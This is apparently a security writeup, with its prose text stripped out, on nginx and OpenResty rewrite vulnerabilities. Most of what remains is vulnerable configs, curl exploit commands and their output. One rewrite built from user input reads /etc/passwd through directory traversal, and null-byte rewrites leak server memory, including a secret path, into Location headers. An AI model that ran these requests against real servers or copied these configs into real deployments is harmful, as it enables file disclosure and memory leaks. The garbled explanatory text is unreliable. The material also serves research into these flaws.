- nginx rewrite directory traversal ( SSRF) , , Nginx Amplify Gixy (, , ). OpenResty , .
:
location ~ /rewrite {
rewrite ^.*$ $arg_x;
}
location / {
root html;
index index.html index.htm;
}
curl localhost:8337/rewrite?x=/../../../../../../../etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
...
- nginx , , rewrite . nginx , , , , , . .
(^@ )
location ~ /memleak {
rewrite ^.*$ "^@asdfasdfasdfasdfasdfasdfasdfasdfasdfasdfasdasdf";
}
location / {
root html;
index index.html index.htm;
}
curl localhost:8337/secret -vv
...
curl localhost:8337/memleak -vv
...
Location: http://localhost:8337/secret
...
- Nginx GET- rewrite GET-. nginx . POST . OpenResty GET POST , POST OpenResty .
:
location ~ /memleak {
rewrite_by_lua_block {
ngx.req.read_body();
local args, err = ngx.req.get_post_args();
ngx.req.set_uri( args["url"], true );
}
}
location / {
root html;
index index.html index.htm;
}
:
curl localhost:8337 -d "url=secret" -vv
...
curl localhost:8337 -d "url=%00asdfasdfasdfasdfasdfasdfasdfasdf" -vv
...
Location: http://localhost:8337/{... secret...}
...